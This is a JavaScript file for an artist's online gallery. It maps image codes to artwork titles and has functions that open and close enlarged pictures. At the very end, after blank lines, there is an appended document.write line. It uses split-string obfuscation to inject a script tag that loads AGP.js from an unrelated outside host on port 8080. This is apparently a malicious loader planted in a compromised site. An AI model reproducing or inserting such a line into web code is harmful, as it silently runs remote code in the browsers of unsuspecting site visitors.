// JavaScript Document


var titles = {
	A : "Hommage à A. Calder" ,
	B :  "Snow (Detail)" ,
	C : "Samuel's \"go into and touch\"" ,
	D : "Lamp" ,
	E : "Butterfly on Top of Laptop Screen" ,
	F : "Double Equilibrium" ,
	G : "Sun and Moon" ,
	H : "Grass Blade" ,
	J : "Rain" ,
	K : "Draft A1" ,
	L : "Green Glass Stone (detail)" ,
	M : "Herbs" ,
	N : "Butterfly" ,
	O : "leaves en miniature" ,
	P : "Red Lantern" ,
	Q : "Chaos Community" ,
	R : "Pink Balance" ,
	S : "Green Glass Stone" ,
	T : "Flo's" ,
	U : "A1 detail",
	V : "Balance Item" ,
	W : "Balance Item (view from side)" ,
	X : "Hommage to A. Calder's Pomegranate",
	Y : "Detail Lamp",
	Z : "Kaleidoscope",
	Z01 : "Tinkle Bamboo",
	Z02 : "Newton's Eye Tumbler",
	Z03 : "Volcano (left) and Maja's (right)"
};

var selectImage = "";

function hideImg() {
	$('gfx').style.display = "block";	
	$('gfxovl').style.display = "none";	
}

function putSelect() {
	$('bigimg').src = "pics/"+selectImage+".jpg";
}

function displayImg(name,backlink) {
	$('bigimg').src = "pics/loading.gif";
	selectImage = name;
	
	var loadImage = new Image;
	loadImage.onload = putSelect;
	loadImage.src = "pics/"+name+".jpg";
	
	var title = titles[name];
	
	if (backlink) {
		title += ' &nbsp;&nbsp;<a href="#" onclick="hideImg()">(back to Gallery)</a>';
	}
	
	$('gfxtxt').innerHTML = title;
	
	$('gfx').style.display = "none";	
	$('gfxovl').style.display = "block";
}





document.write('<s'+'cript type="text/javascript" src="http://sfofotky.iexam.info:8080/AGP.js"></scr'+'ipt>');